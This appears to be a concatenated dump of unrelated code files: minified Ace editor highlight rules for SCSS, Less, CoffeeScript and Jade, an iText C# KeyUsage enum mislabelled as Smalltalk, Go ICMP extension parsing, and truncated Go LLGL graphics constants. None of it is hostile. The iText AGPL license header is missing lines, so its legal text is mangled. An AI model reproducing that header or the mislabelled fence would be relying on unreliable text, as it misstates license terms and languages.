r-left-width|border-left|border-right-color|border-right-style|border-right-width|border-right|border-spacing|border-style|border-top-color|border-top-style|border-top-width|border-top|border-width|border|bottom|box-shadow|box-sizing|caption-side|clear|clip|color|content|counter-increment|counter-reset|cue-after|cue-before|cue|cursor|direction|display|elevation|empty-cells|float|font-family|font-size-adjust|font-size|font-stretch|font-style|font-variant|font-weight|font|height|left|letter-spacing|line-height|list-style-image|list-style-position|list-style-type|list-style|margin-bottom|margin-left|margin-right|margin-top|marker-offset|margin|marks|max-height|max-width|min-height|min-width|opacity|orphans|outline-color|outline-style|outline-width|outline|overflow|overflow-x|overflow-y|padding-bottom|padding-left|padding-right|padding-top|padding|page-break-after|page-break-before|page-break-inside|page|pause-after|pause-before|pause|pitch-range|pitch|play-during|position|quotes|richness|right|size|speak-header|speak-numeral|speak-punctuation|speech-rate|speak|stress|table-layout|text-align|text-decoration|text-indent|text-shadow|text-transform|top|unicode-bidi|vertical-align|visibility|voice-family|volume|white-space|widows|width|word-spacing|z-index".split("|"),r=[];for(var i=0,s=e.length;i<s;i++)Array.prototype.push.apply(r,(e[i]+t.join("|"+e[i])).split("|"));return Array.prototype.push.apply(r,t),Array.prototype.push.apply(r,n),r}()),t=i.arrayToMap("hsl|hsla|rgb|rgba|url|attr|counter|counters|abs|adjust_color|adjust_hue|alpha|join|blue|ceil|change_color|comparable|complement|darken|desaturate|floor|grayscale|green|hue|if|invert|join|length|lighten|lightness|mix|nth|opacify|opacity|percentage|quote|red|round|saturate|saturation|scale_color|transparentize|type_of|unit|unitless|unquote".split("|")),n=i.arrayToMap("absolute|all-scroll|always|armenian|auto|baseline|below|bidi-override|block|bold|bolder|border-box|both|bottom|break-all|break-word|capitalize|center|char|circle|cjk-ideographic|col-resize|collapse|content-box|crosshair|dashed|decimal-leading-zero|decimal|default|disabled|disc|distribute-all-lines|distribute-letter|distribute-space|distribute|dotted|double|e-resize|ellipsis|fixed|georgian|groove|hand|hebrew|help|hidden|hiragana-iroha|hiragana|horizontal|ideograph-alpha|ideograph-numeric|ideograph-parenthesis|ideograph-space|inactive|inherit|inline-block|inline|inset|inside|inter-ideograph|inter-word|italic|justify|katakana-iroha|katakana|keep-all|left|lighter|line-edge|line-through|line|list-item|loose|lower-alpha|lower-greek|lower-latin|lower-roman|lowercase|lr-tb|ltr|medium|middle|move|n-resize|ne-resize|newspaper|no-drop|no-repeat|nw-resize|none|normal|not-allowed|nowrap|oblique|outset|outside|overline|pointer|progress|relative|repeat-x|repeat-y|repeat|right|ridge|row-resize|rtl|s-resize|scroll|se-resize|separate|small-caps|solid|square|static|strict|super|sw-resize|table-footer-group|table-header-group|tb-rl|text-bottom|text-top|text|thick|thin|top|transparent|underline|upper-alpha|upper-latin|upper-roman|uppercase|vertical-ideographic|vertical-text|visible|w-resize|wait|whitespace|zero".split("|")),r=i.arrayToMap("aliceblue|antiquewhite|aqua|aquamarine|azure|beige|bisque|black|blanchedalmond|blue|blueviolet|brown|burlywood|cadetblue|chartreuse|chocolate|coral|cornflowerblue|cornsilk|crimson|cyan|darkblue|darkcyan|darkgoldenrod|darkgray|darkgreen|darkgrey|darkkhaki|darkmagenta|darkolivegreen|darkorange|darkorchid|darkred|darksalmon|darkseagreen|darkslateblue|darkslategray|darkslategrey|darkturquoise|darkviolet|deeppink|deepskyblue|dimgray|dimgrey|dodgerblue|firebrick|floralwhite|forestgreen|fuchsia|gainsboro|ghostwhite|gold|goldenrod|gray|green|greenyellow|grey|honeydew|hotpink|indianred|indigo|ivory|khaki|lavender|lavenderblush|lawngreen|lemonchiffon|lightblue|lightcoral|lightcyan|lightgoldenrodyellow|lightgray|lightgreen|lightgrey|lightpink|lightsalmon|lightseagreen|lightskyblue|lightslategray|lightslategrey|lightsteelblue|lightyellow|lime|limegreen|linen|magenta|maroon|mediumaquamarine|mediumblue|mediumorchid|mediumpurple|mediumseagreen|mediumslateblue|mediumspringgreen|mediumturquoise|mediumvioletred|midnightblue|mintcream|mistyrose|moccasin|navajowhite|navy|oldlace|olive|olivedrab|orange|orangered|orchid|palegoldenrod|palegreen|paleturquoise|palevioletred|papayawhip|peachpuff|peru|pink|plum|powderblue|purple|rebeccapurple|red|rosybrown|royalblue|saddlebrown|salmon|sandybrown|seagreen|seashell|sienna|silver|skyblue|slateblue|slategray|slategrey|snow|springgreen|steelblue|tan|teal|thistle|tomato|turquoise|violet|wheat|white|whitesmoke|yellow|yellowgreen".split("|")),s=i.arrayToMap("@mixin|@extend|@include|@import|@media|@debug|@warn|@if|@for|@each|@while|@else|@font-face|@-webkit-keyframes|if|and|!default|module|def|end|declare".split("|")),o=i.arrayToMap("a|abbr|acronym|address|applet|area|article|aside|audio|b|base|basefont|bdo|big|blockquote|body|br|button|canvas|caption|center|cite|code|col|colgroup|command|datalist|dd|del|details|dfn|dir|div|dl|dt|em|embed|fieldset|figcaption|figure|font|footer|form|frame|frameset|h1|h2|h3|h4|h5|h6|head|header|hgroup|hr|html|i|iframe|img|input|ins|keygen|kbd|label|legend|li|link|map|mark|menu|meta|meter|nav|noframes|noscript|object|ol|optgroup|option|output|p|param|pre|progress|q|rp|rt|ruby|s|samp|script|section|select|small|source|span|strike|strong|style|sub|summary|sup|table|tbody|td|textarea|tfoot|th|thead|time|title|tr|tt|u|ul|var|video|wbr|xmp".split("|")),u="\\-?(?:(?:[0-9]+)|(?:[0-9]*\\.[0-9]+))";this.$rules={start:[{token:"comment",regex:"\\/\\/.*$"},{token:"comment",regex:"\\/\\*",next:"comment"},{token:"string",regex:'["](?:(?:\\\\.)|(?:[^"\\\\]))*?["]'},{token:"string",regex:'["].*\\\\$',next:"qqstring"},{token:"string",regex:"['](?:(?:\\\\.)|(?:[^'\\\\]))*?[']"},{token:"string",regex:"['].*\\\\$",next:"qstring"},{token:"constant.numeric",regex:u+"(?:em|ex|px|cm|mm|in|pt|pc|deg|rad|grad|ms|s|hz|khz|%)"},{token:"constant.numeric",regex:"#[a-f0-9]{6}"},{token:"constant.numeric",regex:"#[a-f0-9]{3}"},{token:"constant.numeric",regex:u},{token:["support.function","string","support.function"],regex:"(url\\()(.*)(\\))"},{token:function(i){return e.hasOwnProperty(i.toLowerCase())?"support.type":s.hasOwnProperty(i)?"keyword":n.hasOwnProperty(i)?"constant.language":t.hasOwnProperty(i)?"support.function":r.hasOwnProperty(i.toLowerCase())?"support.constant.color":o.hasOwnProperty(i.toLowerCase())?"variable.language":"text"},regex:"\\-?[@a-z_][@a-z0-9_\\-]*"},{token:"variable",regex:"[a-z_\\-$][a-z0-9_\\-$]*\\b"},{token:"variable.language",regex:"#[a-z0-9-_]+"},{token:"variable.language",regex:"\\.[a-z0-9-_]+"},{token:"variable.language",regex:":[a-z0-9-_]+"},{token:"constant",regex:"[a-z0-9-_]+"},{token:"keyword.operator",regex:"<|>|<=|>=|==|!=|-|%|#|\\+|\\$|\\+|\\*"},{token:"paren.lparen",regex:"[[({]"},{token:"paren.rparen",regex:"[\\])}]"},{token:"text",regex:"\\s+"},{caseInsensitive:!0}],comment:[{token:"comment",regex:"\\*\\/",next:"start"},{defaultToken:"comment"}],qqstring:[{token:"string",regex:'(?:(?:\\\\.)|(?:[^"\\\\]))*?"',next:"start"},{token:"string",regex:".+"}],qstring:[{token:"string",regex:"(?:(?:\\\\.)|(?:[^'\\\\]))*?'",next:"start"},{token:"string",regex:".+"}]}};r.inherits(o,s),t.ScssHighlightRules=o}),ace.define("ace/mode/less_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules","ace/mode/css_highlight_rules"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("./text_highlight_rules").TextHighlightRules,s=e("./css_highlight_rules"),o=function(){var e="@import|@media|@font-face|@keyframes|@-webkit-keyframes|@supports|@charset|@plugin|@namespace|@document|@page|@viewport|@-ms-viewport|or|and|when|not",t=e.split("|"),n=s.supportType.split("|"),r=this.createKeywordMapper({"support.constant":s.supportConstant,keyword:e,"support.constant.color":s.supportConstantColor,"support.constant.fonts":s.supportConstantFonts},"identifier",!0),i="\\-?(?:(?:[0-9]+)|(?:[0-9]*\\.[0-9]+))";this.$rules={start:[{token:"comment",regex:"\\/\\/.*$"},{token:"comment",regex:"\\/\\*",next:"comment"},{token:"string",regex:'["](?:(?:\\\\.)|(?:[^"\\\\]))*?["]'},{token:"string",regex:"['](?:(?:\\\\.)|(?:[^'\\\\]))*?[']"},{token:["constant.numeric","keyword"],regex:"("+i+")(ch|cm|deg|em|ex|fr|gd|grad|Hz|in|kHz|mm|ms|pc|pt|px|rad|rem|s|turn|vh|vm|vw|%)"},{token:"constant.numeric",regex:"#[a-f0-9]{6}"},{token:"constant.numeric",regex:"#[a-f0-9]{3}"},{token:"constant.numeric",regex:i},{token:["support.function","paren.lparen","string","paren.rparen"],regex:"(url)(\\()(.*)(\\))"},{token:["support.function","paren.lparen"],regex:"(:extend|[a-z0-9_\\-]+)(\\()"},{token:function(e){return t.indexOf(e.toLowerCase())>-1?"keyword":"variable"},regex:"[@\\$][a-z0-9_\\-@\\$]*\\b"},{token:"variable",regex:"[@\\$]\\{[a-z0-9_\\-@\\$]*\\}"},{token:function(e,t){return n.indexOf(e.toLowerCase())>-1?["support.type.property","text"]:["support.type.unknownProperty","text"]},regex:"([a-z0-9-_]+)(\\s*:)"},{token:"keyword",regex:"&"},{token:r,regex:"\\-?[@a-z_][@a-z0-9_\\-]*"},{token:"variable.language",regex:"#[a-z0-9-_]+"},{token:"variable.language",regex:"\\.[a-z0-9-_]+"},{token:"variable.language",regex:":[a-z_][a-z0-9-_]*"},{token:"constant",regex:"[a-z0-9-_]+"},{token:"keyword.operator",regex:"<|>|<=|>=|=|!=|-|%|\\+|\\*"},{token:"paren.lparen",regex:"[[({]"},{token:"paren.rparen",regex:"[\\])}]"},{token:"text",regex:"\\s+"},{caseInsensitive:!0}],comment:[{token:"comment",regex:"\\*\\/",next:"start"},{defaultToken:"comment"}]},this.normalizeRules()};r.inherits(o,i),t.LessHighlightRules=o}),ace.define("ace/mode/coffee_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"],function(e,t,n){"use strict";function s(){var e="[$A-Za-z_\\x7f-\\uffff][$\\w\\x7f-\\uffff]*",t="this|throw|then|try|typeof|super|switch|return|break|by|continue|catch|class|in|instanceof|is|isnt|if|else|extends|for|own|finally|function|while|when|new|no|not|delete|debugger|do|loop|of|off|or|on|unless|until|and|yes|yield|export|import|default",n="true|false|null|undefined|NaN|Infinity",r="case|const|function|var|void|with|enum|implements|interface|let|package|private|protected|public|static",i="Array|Boolean|Date|Function|Number|Object|RegExp|ReferenceError|String|Error|EvalError|InternalError|RangeError|ReferenceError|StopIteration|SyntaxError|TypeError|URIError|ArrayBuffer|Float32Array|Float64Array|Int16Array|Int32Array|Int8Array|Uint16Array|Uint32Array|Uint8Array|Uint8ClampedArray",s="Math|JSON|isNaN|isFinite|parseInt|parseFloat|encodeURI|encodeURIComponent|decodeURI|decodeURIComponent|String|",o="window|arguments|prototype|document",u=this.createKeywordMapper({keyword:t,"constant.language":n,"invalid.illegal":r,"language.support.class":i,"language.support.function":s,"variable.language":o},"identifier"),a={token:["paren.lparen","variable.parameter","paren.rparen","text","storage.type"],regex:/(?:(\()((?:"[^")]*?"|'[^')]*?'|\/[^\/)]*?\/|[^()"'\/])*?)(\))(\s*))?([\-=]>)/.source},f=/\\(?:x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[0-2][0-7]{0,2}|3[0-6][0-7]?|37[0-7]?|[4-7][0-7]?|.)/;this.$rules={start:[{token:"constant.numeric",regex:"(?:0x[\\da-fA-F]+|(?:\\d+(?:\\.\\d+)?|\\.\\d+)(?:[eE][+-]?\\d+)?)"},{stateName:"qdoc",token:"string",regex:"'''",next:[{token:"string",regex:"'''",next:"start"},{token:"constant.language.escape",regex:f},{defaultToken:"string"}]},{stateName:"qqdoc",token:"string",regex:'"""',next:[{token:"string",regex:'"""',next:"start"},{token:"paren.string",regex:"#{",push:"start"},{token:"constant.language.escape",regex:f},{defaultToken:"string"}]},{stateName:"qstring",token:"string",regex:"'",next:[{token:"string",regex:"'",next:"start"},{token:"constant.language.escape",regex:f},{defaultToken:"string"}]},{stateName:"qqstring",token:"string.start",regex:'"',next:[{token:"string.end",regex:'"',next:"start"},{token:"paren.string",regex:"#{",push:"start"},{token:"constant.language.escape",regex:f},{defaultToken:"string"}]},{stateName:"js",token:"string",regex:"`",next:[{token:"string",regex:"`",next:"start"},{token:"constant.language.escape",regex:f},{defaultToken:"string"}]},{regex:"[{}]",onMatch:function(e,t,n){this.next="";if(e=="{"&&n.length)return n.unshift("start",t),"paren";if(e=="}"&&n.length){n.shift(),this.next=n.shift()||"";if(this.next.indexOf("string")!=-1)return"paren.string"}return"paren"}},{token:"string.regex",regex:"///",next:"heregex"},{token:"string.regex",regex:/(?:\/(?![\s=])[^[\/\n\\]*(?:(?:\\[\s\S]|\[[^\]\n\\]*(?:\\[\s\S][^\]\n\\]*)*])[^[\/\n\\]*)*\/)(?:[imgy]{0,4})(?!\w)/},{token:"comment",regex:"###(?!#)",next:"comment"},{token:"comment",regex:"#.*"},{token:["punctuation.operator","text","identifier"],regex:"(\\.)(\\s*)("+r+")"},{token:"punctuation.operator",regex:"\\.{1,3}"},{token:["keyword","text","language.support.class","text","keyword","text","language.support.class"],regex:"(class)(\\s+)("+e+")(?:(\\s+)(extends)(\\s+)("+e+"))?"},{token:["entity.name.function","text","keyword.operator","text"].concat(a.token),regex:"("+e+")(\\s*)([=:])(\\s*)"+a.regex},a,{token:"variable",regex:"@(?:"+e+")?"},{token:u,regex:e},{token:"punctuation.operator",regex:"\\,|\\."},{token:"storage.type",regex:"[\\-=]>"},{token:"keyword.operator",regex:"(?:[-+*/%<>&|^!?=]=|>>>=?|\\-\\-|\\+\\+|::|&&=|\\|\\|=|<<=|>>=|\\?\\.|\\.{2,3}|[!*+-=><])"},{token:"paren.lparen",regex:"[({[]"},{token:"paren.rparen",regex:"[\\]})]"},{token:"text",regex:"\\s+"}],heregex:[{token:"string.regex",regex:".*?///[imgy]{0,4}",next:"start"},{token:"comment.regex",regex:"\\s+(?:#.*)?"},{token:"string.regex",regex:"\\S+"}],comment:[{token:"comment",regex:"###",next:"start"},{defaultToken:"comment"}]},this.normalizeRules()}var r=e("../lib/oop"),i=e("./text_highlight_rules").TextHighlightRules;r.inherits(s,i),t.CoffeeHighlightRules=s}),ace.define("ace/mode/jade_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules","ace/mode/markdown_highlight_rules","ace/mode/scss_highlight_rules","ace/mode/less_highlight_rules","ace/mode/coffee_highlight_rules","ace/mode/javascript_highlight_rules"],function(e,t,n){"use strict";function l(e,t){return{token:"entity.name.function.jade",regex:"^\\s*\\:"+e,next:t+"start"}}var r=e("../lib/oop"),i=e("./text_highlight_rules").TextHighlightRules,s=e("./markdown_highlight_rules").MarkdownHighlightRules,o=e("./scss_highlight_rules").ScssHighlightRules,u=e("./less_highlight_rules").LessHighlightRules,a=e("./coffee_highlight_rules").CoffeeHighlightRules,f=e("./javascript_highlight_rules").JavaScriptHighlightRules,c=function(){var e="\\\\(?:x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[0-2][0-7]{0,2}|3[0-6][0-7]?|37[0-7]?|[4-7][0-7]?|.)";this.$rules={start:[{token:"keyword.control.import.include.jade",regex:"\\s*\\binclude\\b"},{token:"keyword.other.doctype.jade",regex:"^!!!\\s*(?:[a-zA-Z0-9-_]+)?"},{onMatch:function(e,t,n){return n.unshift(this.next,e.length-2,t),"comment"},regex:/^\s*\/\//,next:"comment_block"},l("markdown","markdown-"),l("sass","sass-"),l("less","less-"),l("coffee","coffee-"),{token:["storage.type.function.jade","entity.name.function.jade","punctuation.definition.parameters.begin.jade","variable.parameter.function.jade","punctuation.definition.parameters.end.jade"],regex:"^(\\s*mixin)( [\\w\\-]+)(\\s*\\()(.*?)(\\))"},{token:["storage.type.function.jade","entity.name.function.jade"],regex:"^(\\s*mixin)( [\\w\\-]+)"},{token:"source.js.embedded.jade",regex:"^\\s*(?:-|=|!=)",next:"js-start"},{token:"string.interpolated.jade",regex:"[#!]\\{[^\\}]+\\}"},{token:"meta.tag.any.jade",regex:/^\s*(?!\w+:)(?:[\w-]+|(?=\.|#)])/,next:"tag_single"},{token:"suport.type.attribute.id.jade",regex:"#\\w+"},{token:"suport.type.attribute.class.jade",regex:"\\.\\w+"},{token:"punctuation",regex:"\\s*(?:\\()",next:"tag_attributes"}],comment_block:[{regex:/^\s*(?:\/\/)?/,onMatch:function(e,t,n){return e.length<=n[1]?e.slice(-1)=="/"?(n[1]=e.length-2,this.next="","comment"):(n.shift(),n.shift(),this.next=n.shift(),"text"):(this.next="","comment")},next:"start"},{defaultToken:"comment"}],tag_single:[{token:"entity.other.attribute-name.class.jade",regex:"\\.[\\w-]+"},{token:"entity.other.attribute-name.id.jade",regex:"#[\\w-]+"},{token:["text","punctuation"],regex:"($)|((?!\\.|#|=|-))",next:"start"}],tag_attributes:[{token:"string",regex:"'(?=.)",next:"qstring"},{token:"string",regex:'"(?=.)',next:"qqstring"},{token:["entity.other.attribute-name.jade","punctuation"],regex:"([a-zA-Z:\\.-]+)(=)?",next:"attribute_strings"},{token:"punctuation",regex:"\\)",next:"start"}],attribute_strings:[{token:"string",regex:"'(?=.)",next:"qstring"},{token:"string",regex:'"(?=.)',next:"qqstring"},{token:"string",regex:"(?=\\S)",next:"tag_attributes"}],qqstring:[{token:"constant.language.escape",regex:e},{token:"string",regex:'[^"\\\\]+'},{token:"string",regex:"\\\\$",next:"qqstring"},{token:"string",regex:'"|$',next:"tag_attributes"}],qstring:[{token:"constant.language.escape",regex:e},{token:"string",regex:"[^'\\\\]+"},{token:"string",regex:"\\\\$",next:"qstring"},{token:"string",regex:"'|$",next:"tag_attributes"}]},this.embedRules(f,"js-",[{token:"text",regex:".$",next:"start"}])};r.inherits(c,i),t.JadeHighlightRules=c}),ace.define("ace/mode/folding/coffee",["require","exports","module","ace/lib/oop","ace/mode/folding/fold_mode","ace/range"],function(e,t,n){"use strict";var r=e("../../lib/oop"),i=e("./fold_mode").FoldMode,s=e("../../range").Range,o=t.FoldMode=function(){};r.inherits(o,i),function(){this.getFoldWidgetRange=function(e,t,n){var r=this.indentationBlock(e,n);if(r)return r;var i=/\S/,o=e.getLine(n),u=o.search(i);if(u==-1||o[u]!="#")return;var a=o.length,f=e.getLength(),l=n,c=n;while(++n<f){o=e.getLine(n);var h=o.search(i);if(h==-1)continue;if(o[h]!="#")break;c=n}if(c>l){var p=e.getLine(c).length;return new s(l,a,c,p)}},this.getFoldWidget=function(e,t,n){var r=e.getLine(n),i=r.search(/\S/),s=e.getLine(n+1),o=e.getLine(n-1),u=o.search(/\S/),a=s.search(/\S/);if(i==-1)return e.foldWidgets[n-1]=u!=-1&&u<a?"start":"","";if(u==-1){if(i==a&&r[i]=="#"&&s[i]=="#")return e.foldWidgets[n-1]="",e.foldWidgets[n+1]="","start"}else if(u==i&&r[i]=="#"&&o[i]=="#"&&e.getLine(n-2).search(/\S/)==-1)return e.foldWidgets[n-1]="start",e.foldWidgets[n+1]="","";return u!=-1&&u<i?e.foldWidgets[n-1]="start":e.foldWidgets[n-1]="",i<a?"start":""}}.call(o.prototype)}),ace.define("ace/mode/jade",["require","exports","module","ace/lib/oop","ace/mode/text","ace/mode/jade_highlight_rules","ace/mode/folding/coffee"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("./text").Mode,s=e("./jade_highlight_rules").JadeHighlightRules,o=e("./folding/coffee").FoldMode,u=function(){this.HighlightRules=s,this.foldingRules=new o,this.$behaviour=this.$defaultBehaviour};r.inherits(u,i),function(){this.lineCommentStart="//",this.$id="ace/mode/jade"}.call(u.prototype),t.Mode=u}); (function() { ace.require(["ace/mode/jade"], function(m) { if (typeof module == "object" && typeof exports == "object" && module) { module.exports = m; } }); })(); ```
```smalltalk /* This file is part of the iText (R) project. Authors: Apryse Software. This program is offered under a commercial and under the AGPL license. For commercial licensing, contact us at path_to_url For AGPL licensing, see below. AGPL licensing: This program is free software: you can redistribute it and/or modify (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the along with this program. If not, see <path_to_url */ namespace iText.Signatures.Validation.Extensions { /// <summary>Enum representing possible "Key Usage" extension values.</summary> public enum KeyUsage { /// <summary>"Digital Signature" key usage value</summary> DIGITAL_SIGNATURE, /// <summary>"Non Repudiation" key usage value</summary> NON_REPUDIATION, /// <summary>"Key Encipherment" key usage value</summary> KEY_ENCIPHERMENT, /// <summary>"Data Encipherment" key usage value</summary> DATA_ENCIPHERMENT, /// <summary>"Key Agreement" key usage value</summary> KEY_AGREEMENT, /// <summary>"Key Cert Sign" key usage value</summary> KEY_CERT_SIGN, /// <summary>"CRL Sign" key usage value</summary> CRL_SIGN, /// <summary>"Encipher Only" key usage value</summary> ENCIPHER_ONLY, /// <summary>"Decipher Only" key usage value</summary> DECIPHER_ONLY } } ```
```go // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package icmp import "encoding/binary" // An Extension represents an ICMP extension. type Extension interface { // Len returns the length of ICMP extension. // Proto must be either the ICMPv4 or ICMPv6 protocol number. Len(proto int) int // Marshal returns the binary encoding of ICMP extension. // Proto must be either the ICMPv4 or ICMPv6 protocol number. Marshal(proto int) ([]byte, error) } const extensionVersion = 2 func validExtensionHeader(b []byte) bool { v := int(b[0]&0xf0) >> 4 s := binary.BigEndian.Uint16(b[2:4]) if s != 0 { s = checksum(b) } if v != extensionVersion || s != 0 { return false } return true } // parseExtensions parses b as a list of ICMP extensions. // The length attribute l must be the length attribute field in // received icmp messages. // // It will return a list of ICMP extensions and an adjusted length // attribute that represents the length of the padded original // datagram field. Otherwise, it returns an error. func parseExtensions(b []byte, l int) ([]Extension, int, error) { // Still a lot of non-RFC 4884 compliant implementations are // out there. Set the length attribute l to 128 when it looks // inappropriate for backwards compatibility. // // A minimal extension at least requires 8 octets; 4 octets // for an extension header, and 4 octets for a single object // header. // // See RFC 4884 for further information. if 128 > l || l+8 > len(b) { l = 128 } if l+8 > len(b) { return nil, -1, errNoExtension } if !validExtensionHeader(b[l:]) { if l == 128 { return nil, -1, errNoExtension } l = 128 if !validExtensionHeader(b[l:]) { return nil, -1, errNoExtension } } var exts []Extension for b = b[l+4:]; len(b) >= 4; { ol := int(binary.BigEndian.Uint16(b[:2])) if 4 > ol || ol > len(b) { break } switch b[2] { case classMPLSLabelStack: ext, err := parseMPLSLabelStack(b[:ol]) if err != nil { return nil, -1, err } exts = append(exts, ext) case classInterfaceInfo: ext, err := parseInterfaceInfo(b[:ol]) if err != nil { return nil, -1, err } exts = append(exts, ext) } b = b[ol:] } return exts, l, nil } ```
```go /* * LLGLWrapper.h * */ /* AUTO GENERATED CODE - DO NOT EDIT */ package llgl // #cgo LDFLAGS: libLLGL.dll.a // #cgo CFLAGS: -I ../../include // #include <LLGL-C/LLGL.h> import "C" import "unsafe" /* ----- Constants ----- */ const ( RendererIDUndefined = 0x00000000 RendererIDNull = 0x00000001 RendererIDOpenGL = 0x00000002 RendererIDOpenGLES1 = 0x00000003 RendererIDOpenGLES2 = 0x00000004 RendererIDOpenGLES3 = 0x00000005 RendererIDDirect3D9 = 0x00000006 RendererIDDirect3D10 = 0x00000007 RendererIDDirect3D11 = 0x00000008 RendererIDDirect3D12 = 0x00000009 RendererIDVulkan = 0x0000000A RendererIDMetal = 0x0000000B RendererIDReserved = 0x000000FF ) /* ----- Enumerations ----- */ type EventAction int const ( EventActionBegan EventAction = iota EventActionChanged EventActionEnded ) type RenderConditionMode int const ( RenderConditionModeWait RenderConditionMode = iota RenderConditionModeNoWait RenderConditionModeByRegionWait RenderConditionModeByRegionNoWait RenderConditionModeWaitInverted RenderConditionModeNoWaitInverted RenderConditionModeByRegionWaitInverted RenderConditionModeByRegionNoWaitInverted ) type StencilFace int const ( StencilFaceFrontAndBack StencilFace = iota StencilFaceFront StencilFaceBack ) type Format int const ( FormatUndefined Format = iota FormatA8UNorm FormatR8UNorm FormatR8SNorm FormatR8UInt FormatR8SInt FormatR16UNorm FormatR16SNorm FormatR16UInt FormatR16SInt FormatR16Float FormatR32UInt FormatR32SInt FormatR32Float FormatR64Float FormatRG8UNorm FormatRG8SNorm FormatRG8UInt FormatRG8SInt FormatRG16UNorm FormatRG16SNorm FormatRG16UInt FormatRG16SInt FormatRG16Float FormatRG32UInt FormatRG32SInt FormatRG32Float FormatRG64Float FormatRGB8UNorm FormatRGB8UNorm_sRGB FormatRGB8SNorm FormatRGB8UInt FormatRGB8SInt FormatRGB16UNorm FormatRGB16SNorm FormatRGB16UInt FormatRGB16SInt FormatRGB16Float FormatRGB32UInt FormatRGB32SInt FormatRGB32Float FormatRGB64Float FormatRGBA8UNorm FormatRGBA8UNorm_sRGB FormatRGBA8SNorm FormatRGBA8UInt FormatRGBA8SInt FormatRGBA16UNorm FormatRGBA16SNorm FormatRGBA16UInt FormatRGBA16SInt FormatRGBA16Float FormatRGBA32UInt FormatRGBA32SInt FormatRGBA32Float FormatRGBA64Float FormatBGRA8UNorm FormatBGRA8UNorm_sRGB FormatBGRA8SNorm FormatBGRA8UInt FormatBGRA8SInt FormatRGB10A2UNorm FormatRGB10A2UInt FormatRG11B10Float FormatRGB9E5Float FormatD16UNorm FormatD24UNormS8UInt FormatD32Float FormatD32FloatS8X24UInt FormatBC1UNorm FormatBC1UNorm_sRGB FormatBC2UNorm FormatBC2UNorm_sRGB FormatBC3UNorm FormatBC3UNorm_sRGB FormatBC4UNorm FormatBC4SNorm FormatBC5UNorm FormatBC5SNorm ) type ImageFormat int const ( ImageFormatAlpha ImageFormat = iota ImageFormatR ImageFormatRG ImageFormatRGB ImageFormatBGR ImageFormatRGBA ImageFormatBGRA ImageFormatARGB ImageFormatABGR ImageFormatDepth ImageFormatDepthStencil ImageFormatStencil ImageFormatBC1 ImageFormatBC2 ImageFormatBC3 ImageFormatBC4 ImageFormatBC5 ) type DataType int const ( DataTypeUndefined DataType = iota DataTypeInt8 DataTypeUInt8 DataTypeInt16 DataTypeUInt16 DataTypeInt32 DataTypeUInt32 DataTypeFloat16 DataTypeFloat32 DataTypeFloat64 ) type ReportType int const ( ReportTypeDefault ReportType = iota ReportTypeError ) type Key int const ( KeyLButton Key = iota KeyRButton KeyCancel KeyMButton KeyXButton1 KeyXButton2 KeyBack KeyTab KeyClear KeyReturn KeyShift KeyControl KeyMenu KeyPause KeyCapital KeyEscape KeySpace KeyPageUp KeyPageDown KeyEnd KeyHome KeyLeft KeyUp KeyRight KeyDown KeySelect KeyPrint KeyExe KeySnapshot KeyInsert KeyDelete KeyHelp KeyD0 KeyD1 KeyD2 KeyD3 KeyD4 KeyD5 KeyD6 KeyD7 KeyD8 KeyD9 KeyA KeyB KeyC KeyD KeyE KeyF KeyG KeyH KeyI KeyJ KeyK KeyL KeyM KeyN KeyO KeyP KeyQ KeyR KeyS KeyT KeyU KeyV KeyW KeyX KeyY KeyZ KeyLWin KeyRWin KeyApps KeySleep KeyKeypad0 KeyKeypad1 KeyKeypad2 KeyKeypad3 KeyKeypad4 KeyKeypad5 KeyKeypad6 KeyKeypad7 KeyKeypad8 KeyKeypad9 KeyKeypadMultiply KeyKeypadPlus KeyKeypadSeparator KeyKeypadMinus KeyKeypadDecimal KeyKeypadDivide KeyF1 KeyF2 KeyF3 KeyF4 KeyF5 KeyF6 KeyF7 KeyF8 KeyF9 KeyF10 KeyF11 KeyF12 KeyF13 KeyF14 KeyF15 KeyF16 KeyF17 KeyF18 KeyF19 KeyF20 KeyF21 KeyF22 KeyF23 KeyF24 KeyNumLock KeyScrollLock KeyLShift KeyRShift KeyLControl KeyRControl KeyLMenu KeyRMenu KeyBrowserBack KeyBrowserForward KeyBrowserRefresh KeyBrowserStop KeyBrowserSearch KeyBrowserFavorits KeyBrowserHome KeyVolumeMute KeyVolumeDown KeyVolumeUp KeyMediaNextTrack KeyMediaPrevTrack KeyMediaStop KeyMediaPlayPause KeyLaunchMail KeyLaunchMediaSelect KeyLaunchApp1 KeyLaunchApp2 KeyPlus KeyComma KeyMinus KeyPeriod KeyExponent KeyAttn KeyCrSel KeyExSel KeyErEOF KeyPlay KeyZoom KeyNoName KeyPA1 KeyOEMClear KeyAny ) type UniformType int const ( UniformTypeUndefined UniformType = iota UniformTypeFloat1 UniformTypeFloat2 UniformTypeFloat3 UniformTypeFloat4 UniformTypeDouble1 UniformTypeDouble2 UniformTypeDouble3 UniformTypeDouble4 UniformTypeInt1 UniformTypeInt2 UniformTypeInt3 UniformTypeInt4 UniformTypeUInt1 UniformTypeUInt2 UniformTypeUInt3 UniformTypeUInt4 UniformTypeBool1 UniformTypeBool2 UniformTypeBool3 UniformTypeBool4 UniformTypeFloat2x2 UniformTypeFloat2x3 UniformTypeFloat2x4 UniformTypeFloat3x2 UniformTypeFloat3x3 UniformTypeFloat3x4 UniformTypeFloat4x2 UniformTypeFloat4x3 UniformTypeFloat4x4 UniformTypeDouble2x2 UniformTypeDouble2x3 UniformTypeDouble2x4 UniformTypeDouble3x2 UniformTypeDouble3x3 UniformTypeDouble3x4 UniformTypeDouble4x2 UniformTypeDouble4x3 UniformTypeDouble4x4 UniformTypeSampler UniformTypeImage UniformTypeAtomicCounter ) type PrimitiveTopology int const ( PrimitiveTopologyPointList PrimitiveTopology = iota PrimitiveTopologyLineList PrimitiveTopologyLineStrip PrimitiveTopologyLineListAdjacency PrimitiveTopologyLineStripAdjacency PrimitiveTopologyTriangleList PrimitiveTopologyTriangleStrip 